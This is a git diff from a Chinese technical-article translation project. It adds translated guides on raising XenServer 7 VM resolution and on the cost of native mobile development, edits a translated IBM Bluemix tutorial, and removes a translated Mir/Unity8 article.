new file mode 100644 index 0000000000..5ee98112ee --- /dev/null +++ b/translated/tech/20161111 How to increase screen resolution on XenServer 7 GUI Virtual Machine.md @@ -0,0 +1,110 @@ +# 如何在 XenServer 7 GUI 虚拟机(VM)上提高屏幕分辨率 + +内容 + +* * [1. 目的][5] + * [2. 要求][6] + * [3. 难易性][7] + * [4. 惯例][8] + * [5. 指导][9] + * [5.1. 获得 VM UUID][1] + * [5.2. 关闭 VM][2] + * [5.3. 更新 VGA 的 VIDEORAM 设置][3] + * [5.4. 启动 VM][4] + +### 目的 + +如果你想要将 XenServer 虚拟机作为远程桌面,默认的分辨率可能不能满足你的要求。 + + + ![Default xenserver screen VM resolution](https://linuxconfig.org/images/xenserver-7-default-screen-resolution.png) + + +本篇的目标是提高 XenServer 7 GUI 虚拟机(VM)的屏幕分辨率 + +### 要求 + +访问 XenServer 7 系统的特权 + +### 难易性 + +简单 + +### 惯例 + +* **#** - 给定命令需要作为 root 用户权限运行或者使用 `sudo` 命令 +* **$**- 给定命令作为常规权限用户运行 + +### 指导 + +### 获得 VM UUID + +首先,我们需要获得想要提升分辨率的虚拟机的 UUID。 + +``` +# xe vm-list +uuid ( RO) : 09a3d0d3-f16c-b215-9460-50dde9123891 + name-label ( RW): CentOS 7 + power-state ( RO): running +``` + +提示:如果你将此 UUID 保存为 shell 变量会节省一些时间: + +``` +# UUID=09a3d0d3-f16c-b215-9460-50dde9123891 +``` + +### 关闭 VM + +优雅地关闭 VM 或使用 `xe vm-vm-shutdown` 命令: + +``` +# xe vm-shutdown uuid=$UUID +``` + +### 更新 VGA 的 VIDEORAM 设置 + +检查你目前的 VGA 的 VIDEORAM 参数设置: + +``` +# xe vm-param-get uuid=$UUID param-name="platform" param-key=vga +std +# xe vm-param-get uuid=$UUID param-name="platform" param-key=videoram +8 +``` + +要提升屏幕的分辨率,将 VGA 更新到 `std` (如果已经设置过,就不需要做什么),并将 `videoram` 调大几兆,如设置成 16: + +``` +# xe vm-param-set uuid=$UUID platform:vga=std +# xe vm-param-set uuid=$UUID platform:videoram=16 +``` + +### 启动 VM + +``` +# xe vm-start uuid=$UUID +``` + + ![increased xenserver screen VM resolution](https://linuxconfig.org/images/xenserver-7-increased-screen-resolution.png) + +-------------------------------------------------------------------------------- + +via: https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm + +作者:[Lubos Rendek][a] +译者:[geekpi](https://github.com/geekpi) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm +[1]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h5-1-obtain-vm-uuid +[2]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h5-2-shutdown-vm +[3]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h5-3-update-vga-a-videoram-settings +[4]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h5-4-start-vm +[5]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h1-objective +[6]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h2-requirements +[7]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h3-difficulty +[8]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h4-conventions +[9]:https://linuxconfig.org/how-to-increase-screen-resolution-on-xenserver-7-gui-virtual-machine-vm#h5-instructions diff --git a/translated/tech/20161115 Build Deploy and Manage Custom Apps with IBM Bluemix.md b/translated/tech/20161115 Build Deploy and Manage Custom Apps with IBM Bluemix.md index 75a8efb822..48841e1c33 100644 --- a/translated/tech/20161115 Build Deploy and Manage Custom Apps with IBM Bluemix.md +++ b/translated/tech/20161115 Build Deploy and Manage Custom Apps with IBM Bluemix.md @@ -4,11 +4,11 @@ ![IBM Bluemix logo](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/IBM-Blue-mix-logo.jpg?resize=300%2C266) -IBM Bluemix为开发人员提供了构建,部署和管理自定义应用程序的机会。Bluemix建立在Cloud Foundry上。它支持多种编程语言包括IBM的OpenWhisk,它允许开发人员调用任何函数但不需要资源管理。 +IBM Bluemix 为开发人员提供了构建,部署和管理自定义应用程序的机会。Bluemix 建立在 Cloud Foundry 上。它支持多种编程语言,包括 IBM 的 OpenWhisk ,还允许开发人员无需资源管理就调用任何函数。 -Bluemix是由IBM实现的开放标准的基于云的平台。它具有开放的架构,其允许组织能够在云上创建,开发和管理其应用程序。它基于Cloud Foundry,因此可以被视为平台即服务(PaaS)。使用Bluemix,开发人员不必关心云配置,可以专注于他们的应用程序。 云配置将由Bluemix自动完成。 +Bluemix 是由 IBM 实现的开放标准的基于云的平台。它具有开放的架构,其允许组织能够在云上创建,开发和管理其应用程序。它基于 Cloud Foundry ,因此可以被视为平台即服务(PaaS)。使用 Bluemix,开发人员不必关心云端配置,可以专注于他们的应用程序。 云端配置将由 Bluemix 自动完成。 -Bluemix还提供了一个仪表板,通过它,开发人员可以创建,管理和查看服务和应用程序,同时还可以监控资源使用情况。 +Bluemix 还提供了一个仪表板,通过它,开发人员可以创建,管理和查看服务和应用程序,同时还可以监控资源使用情况。 它支持以下编程语言: * Java @@ -17,27 +17,27 @@ Bluemix还提供了一个仪表板,通过它,开发人员可以创建,管 * PHP * Node.js -它还支持OpenWhisk(FaaS),这也是一个IBM的产品,其允许开发人员调用任一功能而不需要任何资源管理。 +它还支持 OpenWhisk(FaaS),这也是一个 IBM 的产品,其允许开发人员调用任一功能而不需要任何资源管理。 ![图1 IBM Bluemix概述](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-1-An-Overview-of-IBM-Bluemix.jpg?resize=296%2C307) -图1 IBM Bluemix概述 +图1 IBM Bluemix 概述 ![图2 IBM Bluemix体系结构](http://i0.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-2-The-IBM-Bluemix-architecture.jpg?resize=350%2C239) -图2 IBM Bluemix体系结构 +图2 IBM Bluemix 体系结构 -![图3 在IBM Bluemix中创建组织](http://i0.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-3-Creating-an-organisation-in-IBM-Bluemix.jpg?resize=350%2C280) +![图3 在IBM Bluemix 中创建组织](http://i0.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-3-Creating-an-organisation-in-IBM-Bluemix.jpg?resize=350%2C280) -图3 在IBM Bluemix中创建组织 +图3 在 IBM Bluemix 中创建组织 -**IBM Bluemix如何工作** +**IBM Bluemix 如何工作** -Bluemix构建在IBM的SoftLayer IaaS(基础架构即服务)之上。它使用Cloud Foundry作为开源PaaS平台。它通过将代码推送到Cloud Foundry开始,Cloud Foundry通过使用其编写应用程序的编程语言,扮演了组合代码和适当的运行时环境的角色。IBM服务,第三方服务或社区构建的服务可用于不同的功能。安全连接器可用于连接本地系统到云。 +Bluemix 构建在 IBM 的 SoftLayer IaaS(基础架构即服务)之上。它使用 Cloud Foundry 作为开源 PaaS 平台。一切起于通过 Cloud Foundry 来推送代码,它扮演着整合代码和根据编写应用所使用的编程语言所适配的运行时环境的角色。IBM 服务、第三方服务或社区构建的服务可用于不同的功能。安全连接器可用于连接本地系统到云。 ![图4 在IBM Bluemix中设置空间](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-4-Setting-up-Space-in-IBM-Bluemix.jpg?resize=350%2C267) -图4 在IBM Bluemix中设置空间 +图4 在 IBM Bluemix 中设置空间 ![图5 应用程序模板](http://i2.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-5-The-app-template.jpg?resize=350%2C135) @@ -45,24 +45,24 @@ Bluemix构建在IBM的SoftLayer IaaS(基础架构即服务)之上。它使 ![图6 IBM Bluemix支持的编程语言](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-6-IBM-Bluemix-supported-programming-languages.jpg?resize=350%2C173) -图6 IBM Bluemix支持的编程语言 +图6 IBM Bluemix 支持的编程语言 -**在Bluemix中创建应用程序** -在本文中,我们将使用Liberty for Java的入门包在IBM Bluemix中创建一个示例“Hello World”应用程序,只需几个简单的步骤。 +**在 Bluemix 中创建应用程序** +在本文中,我们将使用 Liberty for Java 的入门包在 IBM Bluemix 中创建一个示例“Hello World”应用程序,只需几个简单的步骤。 -1. 打开[_https://console.ng.bluemix.net/registration/_] [2] +1. 打开 [_https://console.ng.bluemix.net/registration/_][2] -2. 注册Bluemix帐户 +2. 注册 Bluemix 帐户 3. 点击邮件中的确认链接完成注册过程 -4. 输入您的电子邮件ID,然后点击_Continue_进行登录 +4. 输入您的电子邮件 ID,然后点击 _Continue_ 进行登录 -5. 输入密码并点击_Log in_ +5. 输入密码并点击 _Log in_ -6. 进入_Set up_->_Environment_设置特定区域中的资源共享 +6. 进入 _Set up_ -> _Environment_ 设置特定区域中的资源共享 -7. 创建空间方便管理访问控制和在Bluemix中回滚操作。 我们可以将空间映射到多个开发阶段,如dev,test,uat,pre-prod和prod +7. 创建空间方便管理访问控制和在 Bluemix 中回滚操作。 我们可以将空间映射到多个开发阶段,如 dev, test,uat,pre-prod 和 prod ![图7 命名应用程序](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-7-Naming-the-app.jpg?resize=350%2C133) @@ -74,58 +74,58 @@ Bluemix构建在IBM的SoftLayer IaaS(基础架构即服务)之上。它使 ![图9 IBM Bluemix Java应用程序](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-9-The-IBM-Bluemix-Java-App.jpg?resize=350%2C151) -图9 IBM Bluemix Java应用程序 +图9 IBM Bluemix Java 应用程序 -8. 完成初始配置后,单击_ I'm ready_ -> _Good to Go_! +8. 完成初始配置后,单击 _I'm ready_ -> _Good to Go_ ! -9. 成功登录后,此时检查IBM Bluemix仪表板,特别是Cloud Foundry Apps(其中2GB可用)和Virtual Server(其中0个实例可用)的部分 +9. 成功登录后,此时检查 IBM Bluemix 仪表板,特别是 Cloud Foundry Apps(其中2GB可用)和 Virtual Server(其中0个实例可用)的部分 -10. 点击_Create app_,选择应用创建模板。在我们的例子中,我们将使用一个Web应用程序 +10. 点击 _Create app_,选择应用创建模板。在我们的例子中,我们将使用一个 Web 应用程序 -11. 如何开始?单击Liberty for Java,然后检查其描述 +11. 如何开始?单击 Liberty for Java ,然后查看其描述 -12. 单击_Continue_ +12. 单击 _Continue_ -13. 为新应用命名。对于本文,让我们使用osfy-bluemix-tutorial命名然后单击_Finish_ +13. 为新应用命名。对于本文,让我们使用 osfy-bluemix-tutorial 命名然后单击 _Finish_ -14. 在Bluemix上创建资源和托管应用程序需要等待一些时间。 +14. 在 Bluemix 上创建资源和托管应用程序需要等待一些时间。 15. 几分钟后,应用程式就会开始运作。注意应用程序的URL。 -16. 访问应用程序的URL _http://osfy-bluemix-tutorial.au-syd.mybluemix.net/_, Bingo,我们的第一个在IBM Bluemix上的Java应用程序成功运行。 +16. 访问应用程序的URL _http://osfy-bluemix-tutorial.au-syd.mybluemix.net/_, Bingo,我们的第一个在 IBM Bluemix 上的 Java 应用程序成功运行。 -17. 为了检查源代码,请单击_Files_并在门户中导航到不同文件和文件夹 +17. 为了检查源代码,请单击 _Files_ 并在门户中导航到不同文件和文件夹 -18. _Logs_部分提供所有活动日志,包括从应用程序的创建时起 +18. _Logs_ 部分提供包括从应用程序的创建时起的所有活动日志。 -19. _Environment Variables_部分提供关于VCAP_Services的所有环境变量以及用户定义的环境变量的详细信息 +19. _Environment Variables_ 部分提供关于 VCAP_Services 的所有环境变量以及用户定义的环境变量的详细信息 -20. 要检查应用程序的资源消耗,需要到Liberty for Java部分。 +20. 要检查应用程序的资源消耗,需要到 Liberty for Java 那一部分。 -21. 默认情况下,每个应用程序的_Overview_部分包含资源,应用程序的运行状况和活动日志的详细信息 +21. 默认情况下,每个应用程序的 _Overview_ 部分包含资源,应用程序的运行状况和活动日志的详细信息 -22. 打开Eclipse,转到帮助菜单,然后单击_Eclipse Marketplace_ +22. 打开 Eclipse,转到帮助菜单,然后单击 _Eclipse Marketplace_ -23. 查找_IBM Eclipse tools for Bluemix_并单击_Install_ +23. 查找 _IBM Eclipse tools for Bluemix_ 并单击 _Install_ -24. 确认所选的功能并将其安装在Eclipse中 +24. 确认所选的功能并将其安装在 Eclipse 中 -25. 下载应用程序启动器代码。点击_File Menu_,将它导入到Eclipse中,选择_Import Existing Projects_ -> _Workspace_, 然后开始修改代码 +25. 下载应用程序启动器代码。点击 _File Menu_,将它导入到 Eclipse 中,选择 _Import Existing Projects_ -> _Workspace_, 然后开始修改代码 ![图10 Java应用程序源文件](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-10-The-Java-app-source-files.jpg?resize=350%2C173) -图10 Java应用程序源文件 +图10 Java 应用程序源文件 ![图11 Java应用程序日志](http://i1.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-11-The-Java-app-logs.jpg?resize=350%2C133) -图11 Java应用程序日志 +图11 Java 应用程序日志 ![图12 Java应用程序 - Liberty for Java](http://i0.wp.com/opensourceforu.com/wp-content/uploads/2016/10/Figure-12-Java-app-Liberty-for-Java.jpg?resize=350%2C169) -图12 Java应用程序 - Liberty for Java +图12 Java 应用程序 - Liberty for Java -**为什么选择IBM Bluemix?** -以下是使用IBM Bluemix的一些令人信服的理由: +**为什么选择 IBM Bluemix?** +以下是使用 IBM Bluemix 的一些令人信服的理由: * 支持多种语言和平台 * 免费试用 @@ -134,23 +134,23 @@ Bluemix构建在IBM的SoftLayer IaaS(基础架构即服务)之上。它使 2. 不需要信用卡 - 3. 30天试用期 - 配额2GB的运行时,支持20个服务,500个route + 3. 30 天试用期 - 配额 2GB 的运行时,支持 20 个服务,500 个 route 4. 无限制地访问标准支持 5. 没有生产使用限制 * 仅为每个使用的运行时和服务付费 -* 快速设置 - 从而加快上市时间 +* 快速设置 - 从而加快上架时间 * 持续交付新功能 * 与本地资源的安全集成 * 用例 - 1. Web应用程序和移动后端 + 1. Web 应用程序和移动后端 - 2. API和内部集成 + 2. API 和内部集成 -* DevOps服务可部署在云上的SaaS,并支持持续交付: +* DevOps 服务可部署在云上的 SaaS ,并支持持续交付: 1. Web IDE @@ -166,7 +166,7 @@ via: http://opensourceforu.com/2016/11/build-deploy-manage-custom-apps-ibm-bluem 作者:[MITESH_SONI][a] 译者:[Vic020](http//www.vicyu.net) -校对:[校对者ID](https://github.com/校对者ID) +校对:[Bestony](https://github.com/Bestony) 本文由 [LCTT](https://github.com/LCTT/TranslateProject) 组织编译,[Linux中国](https://linux.cn/) 荣誉推出 diff --git a/translated/tech/20161128 Mir is not only about Unity8.md b/translated/tech/20161128 Mir is not only about Unity8.md deleted file mode 100644 index 6b5f2b03dc..0000000000 --- a/translated/tech/20161128 Mir is not only about Unity8.md +++ /dev/null @@ -1,85 +0,0 @@ -Mir 并不只关于Unity8 -============================================================ - - ![mir](https://insights.ubuntu.com/wp-content/uploads/2cf2/MIR.png) - -_这是一篇来自 Canonical 的软件工程师 Alan Griffiths 的一篇游客文章。如果你也想投稿,请联系 ubuntu-devices@canonical.com_ - -Mir 是管理程序显示的项目。它可以与当前 Ubuntu 桌面(及很多其他)上使用的我们更熟悉的X-Windows进行比较。我下面会讨论使用 Mir 的一些动机,但本篇的目的是澄清 Mir 和 Unity8 之间的关系。 - -大多数时候你听说 Mir 时都会提到 Unity8。这并不奇怪,因为 Unity8 是 Canonical 的用户shell,用户会一直与它交互。 Mir “只”使这成为可能。Unity8 目前用于手机和平板电脑,也可作为 Ubuntu 16.10 桌面上的“预览”。 - -在这里我想解释一下使用 Mir 是可以使用Unity8 的。或者作为替代 shell,或者作为嵌入式环境的更简单的接口:信息窗口,电子标牌等。Mir “抽象层”证明了这一点,它提供了三个重要的元素: - -1\. libmiral.so - Mir 的稳定接口,提供基本的窗口管理; -2\. miral-shell - 一个提供“传统”和“平铺”窗口管理的示例shell; -3\. miral-kiosk - 一个仅提供基本窗口管理的示例“kiosk”。 - -miral-shell 和 miral-kiosk 示例服务器可从 zesty 的归档文件中获得,Kevin Gunn已经在[记录][1]关于在“Voices”上提供基于 miral-kiosk 的“kiosk”。我将在下面给出更多关于使用这些例子的细节,但在[我的“voices”博客][2]上有更多(包括“如何”开发自己的替代Mir服务器)。 - -**使用 MIR** - -Mir 是一套编程库,而不是独立的程序。这意味着这需要程序去调用它实现相应的功能。有两种方式去使用Mir库:编写程序的时候作为“客户端”,或者在实现shell的实现“服务端”。客户端(和X11一起)典型是使用工具库,而不是直接使用 Mir(或者 X11)。 - -Mir支持GTK、Qt 和 SDL2 中有支持。当在那些工具集中支持它时(默认在Ubuntu中存在),意味着使用这些工具的程序应该“可以工作”于 Mir 中。除此之外还有一个 Xmir:一个运行于 Mir 的 X11 服务器,这允许基于 X 的服务运行在 Mir服务端上。 - -但是开始之前 Mir 客户端需要与 Mir 服务端通信。在最后一个开发周期中,Mir 团队在演示中将 MirAL 作为推荐的方法编写了一个 Mir 服务端和一个“miral-examples”包。关于 Ubuntu 的开版 zesty,你可以从归档中安装: - - -``` -$ sudo apt install miral-examples mir-graphics-drivers-desktop qtubuntu-desktop -``` - -_对于其他平台,你需要自己构建MirAL(有关详细信息,请参阅 Mir 桌面环境示例)。_ - -miral-examples 安装后你可以在 Unity7 中运行一个 Mir 服务端作为一个窗口,然后运行一个客户端(比如 gedit): - -``` -$ miral-shell& -$ miral-run gedit -``` - -这会给你(非常基础)“传统” 的桌面窗口管理。另外你可以试下“tiling” 窗口管理器: - -``` -$ miral-shell --window-manager tiling& -$ miral-run qterminal -``` - -或者(甚至更基础的)kiosk: - -``` -$ miral-kiosk& -$ miral-run 7kaa -``` - -这些 Mir 服务端都不会提供带有“启动器”、通知等的完整“桌面”。但是它们演示了不使用 Unity8 使用 Mir 的可能。 - -**MIR 解决的问题** - -X-Windows 系统已经并且仍然非常成功地提供了与计算机的交互方式。它提供了广泛的硬件和驱动程序一致的抽象。它支持许多桌面环境和图形用户界面工具包,并允许他们在大量计算机上一起工作。 - -但它来自一个与当前电脑使用方式不同的时代,现在有一些问题是很难满足的,因为它需要支持老旧的系统。 -在 1980 年,大多数计算机是由专家管理的大型事物,将它们连接在一起“是非常困难的”。在那个时代,开发软件的成本是这样的,一个程序“监听”另一个程序获得的好处是可以忽略不计的:此时几乎没有计算机,同时它们是独立的,它们所有的工作不对金融开放。 - -X-Windows 在这种环境下开发,通过一系列扩展,已经适应了许多变化。但它本质上是不安全的:任何应用程序可以找出在显示器上显示了什么(并影响它)。你可以编写像 Xeyes(用“眼睛”跟踪光标)或“Tickeys”(通过键盘来生成打字机噪声)等应用程序。现实是,任何和所有应用程序可以跟踪和操纵几乎所有的事情。这就是基于X的桌面如 Unity7、Gnome、KDE和其余工作。 - -X-Windows 中的窗口管理的开放性质不适合用于具有数百万计算机连接到因特网的世界,它们用于信用卡交易和网上银行,且由非专家管理,并自愿安装来自陌生人的程序。人们越来越意识到让 X-Windows 适应新的安全性和图形性能的要求是不可行的。 - -现在至少有两个开源项目旨在提供替代它:Mir 和 Wayland。虽然有些人认为两者是竞争关系,但在很多领域,它们有共同的利益:它们都需要那些假设使用 X11 的软件交互,并且许多支持工作对两者都有益。 - -Canonical 对 X-Windows 的替换品 Mir,它只将信息暴露给它需要的应用程序(因此没有按键监听或光标跟踪)。它可以满足当前时代的需求,并可以利用现代硬件,如图形处理器。 - --------------------------------------------------------------------------------- - -via: https://insights.ubuntu.com/2016/11/28/mir-is-not-only-about-unity8/ - -作者:[ Guest][a] -译者:[geekpi](https://github.com/geekpi) -校对:[校对者ID](https://github.com/校对者ID) - -本文由 [LCTT](https://github.com/LCTT/TranslateProject) 组织编译,[Linux中国](https://linux.cn/) 荣誉推出 - -[a]:https://insights.ubuntu.com/author/guest/ -[1]:http://voices.canonical.com/kevin.gunn/ -[2]:http://voices.canonical.com/alan.griffiths/ diff --git a/translated/tech/20161214 The Cost of Native Mobile App Development is Too Damn High.md b/translated/tech/20161214 The Cost of Native Mobile App Development is Too Damn High.md new file mode 100644 index 0000000000..5dd472644c --- /dev/null +++ b/translated/tech/20161214 The Cost of Native Mobile App Development is Too Damn High.md @@ -0,0 +1,216 @@ +该死,原生移动应用的开发成本太高了! +============================================================ + +### 一个有价值的命题 + +我们遇到了一个临界点。除去几个比较好的用例之外,使用原生框架和原生应用开发团队构建、维护移动应用再也没有意义了。 + + ![](https://cdn-images-1.medium.com/max/1000/1*4nyeufIIgw9B7nMSr5Sybg.jpeg) + +在美国,雇佣 iOS,Android,JavaScript 开发人员的平均花费([http://www.indeed.com/salary][1],[http://www.payscale.com/research/US/Skill=JavaScript/Salary][2]) + +在过去的几年,原生移动应用开发的费用螺旋式上升,无法控制。对没有大量资金的新创业者来说,创建原生应用、MVP 设计架构和原型的难度大大增加。现有的公司需要抓住人才,以便在现有应用上进行迭代开发或者构建一个新的应用。要尽一切努力留住最好的人才,与 [世界各地的公司][9] 拼尽全力 [争][6] 个 [高][7] [下][8]。 + + ![](https://cdn-images-1.medium.com/max/800/1*imThyh2e45RW1np0xXIE4Q.png) + +2015年初,原生方式和混合方式开发 MVP 设计架构的费用对比([Comomentum.com][3]) + +### 这一切对于我们意味着什么? + +如果你的公司很大或者有足够多的现金,旧思维是只要你在原生应用开发方面投入足够多的资金,就高枕无忧。但事实不再如此。 + +Facebook 是你最不会想到的在人才战中失败的公司(因为他们没有失败),它也遇到了原生应用方面金钱无法解决的问题。他们的移动应用庞大而又复杂,[可以看到编译它竟然需要15分钟][10]。这意味着哪怕是极小的用户界面改动,比如移动几个点,测试起来都要花费几个小时(甚至几天)。 + +除了冗长的编译时间,应用的每一个小改动在测试时都需要在两个完全不同的环境(IOS 和 Android)实施,开发团队需要使用两种语言和框架工作,这趟水更浑了。 + +Facebook 对这个问题的解决方案是 [React Native][11]。 + +### 能不能抛弃移动应用,仅面向Web呢? + +[一些人认为移动应用的末日已到。][12] 尽管我很欣赏、尊重 [Eric Elliott][13] 和他的工作,但我们还是通过考察一些近期的数据,进而讨论一下某些相反的观点: + + + ![](https://cdn-images-1.medium.com/max/800/1*s0O7X2PgIqP5_zselxQdqQ.png) + +人们在移动应用上花费的时间(2016年4月,[smartinsights.com][4]) + +> 人们使用 APP 的时间占使用手机总时长的 90% + +目前世界上有 25 亿人在使用移动手机。[这个数字增长到 50 亿的速度会比我们想象的还要快。][14] 在正常情况下,丢掉 45 亿人的生意,或者抛弃有 45 亿人使用的应用程序是绝对荒唐且行不通的。 + +老问题是原生移动应用的开发成本对大多数公司来说太高了。尽管这个问题确实存在,但面向 web 的开发成本也在增加。[在美国,JavaScript 开发者的平均工资已达到 $97,000.00。][15] + +伴随着复杂性的增加以及暴涨的高质量 web 开发需求,雇佣一个JavaScript 开发者的平均价格直逼原生应用开发者。论证 web 开发更便宜已经没用了。 + +### 那混合开发呢? + +混合应用是将 HTML5 应用内嵌在原生应用的容器里,并且提供实现原生平台特性所需的权限。Cordova 和 PhoneGap 就是典型的例子。 + +如果你想构建一个 MVP 设计架构、一个产品原型,或者不担心模仿原生应用的用户体验,那么混合应用会很适合你。谨记如果你最后想把它转为原生应用,整个项目都得重写。 + +此领域有很多创新的东西,我最喜欢的当属 [Ionic Framework][16]。混合开发正变得越来越好,但还不如原生开发那么流畅自然。 + +有很多公司,包括最严峻的初创公司,也包括大中规模的公司,混合应用在质量上的表现似乎没有满足客户的要求,给人的感觉是活糙、不够专业。 + +[听说应用商店里的前 100 名都不是混合应用,][17]我没有证据支持这一观点。如果说有百分之零到百分之五是混合应用,我就不怀疑了。 + +> [我们最大的错误是在 HTML5 身上下了太多的赌注][18] — 马克 扎克伯格  + +### 解决方案 + +如果你紧跟移动开发动向,那么你绝对听说过像 [NativeScript][19] 和 [React Native][20] 这样的项目。 + +通过这些项目,使用用 JavaScript 写成的基本 UI 组成块,像常规 iOS 和 Android 应用那样,就可以构建出高质量的原生移动应用。 + +你可以仅用一位工程师,也可以用一个专业的工程师团队,通过 React Native 使用 [现有代码库][22] 或者 [底层技术][23] 进行跨平台移动应用开发,[原生桌面开发][21], 甚至还有 web 开发。把你的应用发布到 APP Store上, Play Store上,还有 Web 上。如此可以在保证不丧失原生应用性能和质量的同时,使成本仅占传统开发的一小部分。 + +通过 React Native 进行跨平台开发时重复使用其中 90% 的代码也不是没有的事,这个范围通常是 80% 到 90%。 + +如果你的团队使用 React Native, 既可以消除团队之间的分歧,也可以让 UI 和 API 的设计更一致,还可以加快开发速度。 + +在编译时不需要使用 React Native,在保存时应用可以实时更新,也加快了开发速度。 + +React Native 还可以使用 [Code Push][24] 和 [AppHub][25] 这样的工具来远程更新你的 JavaScript 代码。这意味着你可以向用户实时推送更新、新特性,快速修复 bug,绕过打包、发布这些工作,绕过 App Store、Google Play Store 的审核,省去了耗时 2 到 7 天的过程(App Store 一直是整个过程的痛点)。混合应用的这些优势原生应用不可能比得上。 + +如果这个领域的创新力能像刚发行时那样保持,将来你甚至可以为 [Apple Watch ][26],[Apple TV][27],和 [Tizen][28] 这样的平台开发应用。 + +> NativeScript 依然是个相当年轻的框架驱动,Angular 版本 2,[上个月刚刚发布测试版][29]。但只要它保持良好的市场份额,未来就很有前途。 + +你可能还不知道世界上一些最能创新、最大的科技公司在这类技术上下了很大的赌注,特别是 [React Native][30]。 + +我供职过的多家企业以及世界 500 强公司目前都在转移至 React Native。 + +### 在产品中特别注意使用 React Native + +看下面的例子,[这是一个使用 React Native 技术的著名应用列表][31]。 + +### Facebook + + ![](https://cdn-images-1.medium.com/max/800/1*36atCP-kVNoYrit2RMR-8g.jpeg) + +Facebook 公司的 React Native 应用 + +Facebook 的两款应用 [Ads Manager][32] 和 [Facebook Groups][33]都在使用 React Native 技术,并且[将会应用到实现动态消息的框架上][34]。 + +Facebook 也会投入大量的资金创立和维护像 React Native 这样的开源项目,而且开源项目的开发者最近已经创建很多了不起的项目,这是很了不起的工作,像我以及全世界的业务每天都从中享受诸多好处。 + +### Instagram + + ![](https://cdn-images-1.medium.com/max/800/1*MQ0ezjRsUW3A5I0ahryHPg.jpeg) + +Instagram + +Instagram 应用的一部分已经使用了 React Native 技术。 + +### Airbnb + + ![](https://cdn-images-1.medium.com/max/800/1*JS3R_cfLsDFCmAZJmtVEvg.jpeg) + +Airbnb + +Airbnb 的很多东西正用 React Native 重写。(来自 [Leland Richardson][36]) + +超过 90% 的 Airbnb 旅行平台都是用 React Native 写的。(来自 [spikebrehm][37]) + +### Vogue + + ![](https://cdn-images-1.medium.com/max/800/1*V9JMA2L3lXcO1nczCN3gcA.jpeg) + +Vogue 是 2016 年度十佳应用之一 + +Vogue 这么突出不仅仅因为它也用 React Native 写成,而是[因为它被苹果公司评为年度十佳应用之一][38]。 + + ![](https://cdn-images-1.medium.com/max/800/1*vPDVV-vwvjfL3MsHpOO8rQ.jpeg) + +微软 + +微软在 React Native 身上下的赌注很大 + +它早已发布多个开源工具,包括 [Code Push][39],[React Native VS Code][40],以及 [React Native Windows][41],旨在帮助开发者向 React Native 领域转移。 + +微软考虑的是那些已经使用 React Native 为 iOS 和 Android 开发应用的开发者,他们可以重用高达 90% 的代码,不用花费太多额外的时间和成本就可将应用发布到 Windows 上。 + +微软对 React Native 生态的贡献十分广泛,过去几年在开源界的表现很抢眼。 + +### 结论 + +移动应用界面设计和移动应用开发要进行范式转变,下一步就是 React Native 以及与其相似的技术。 + +公司 + +如果你的公司正想着削减成本、加快开发速度,而又不想在应用质量和性能上妥协,这是最适合使用 React Native 的时候,它能提高你的净利润。 + +开发者 + +如果你是一个开发者,想进入一个将来会快速发展的领域,我强烈推荐你把 React Native 列入你的学习清单。 + +如果了解 JavaScript,你会入门很快,工具我首推 [Exponent][5],其他的就看你怎么想了。使用 Exponent 开发者可以轻松的编译、测试和发布跨 Windows 和 MacOS 两个平台的 React Native 应用。 + +如果已经是一位原生应用开发者,你更会受益匪浅。因为在需要时你能够胜任深入研究原生应用边缘的工作。虽然不会经常用到,但在团队需要时这可是十分宝贵的能力。 + +我花了很多时间来学习、指导别人 React Native。因为它让我十分激动,而且使用这个框架创作应用也是我一个平淡的小乐趣。 + +感谢阅读。 + +-------------------------------------------------------------------------------- + +作者简介: + +![](https://cdn-images-1.medium.com/fit/c/60/60/1*uindYEb0zBpZTRV4suSkfg.jpeg) + +教授和构建 React Native 应用的软件开发专家 + +-------------------------------------------------------------------------------- + +via: https://hackernoon.com/the-cost-of-native-mobile-app-development-is-too-damn-high-4d258025033a + +作者:[Nader Dabit][a] +译者:[fuowang](https://github.com/fuowang) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://hackernoon.com/@dabit3 +[1]:http://www.indeed.com/salary +[2]:http://www.payscale.com/research/US/Skill=JavaScript/Salary +[3]:http://www.comentum.com/mobile-app-development-cost.html +[4]:http://www.smartinsights.com/mobile-marketing/mobile-marketing-analytics/mobile-marketing-statistics/attachment/percent-time-spent-on-mobile-apps-2016/ +[5]:https://medium.com/u/df61a4267d7a +[6]:http://www.bizjournals.com/charlotte/how-to/human-resources/2016/12/employers-offer-premium-wages-skilled-workers.html +[7]:https://www.cnet.com/news/silicon-valley-talent-wars-engineers-come-get-your-250k-salary/ 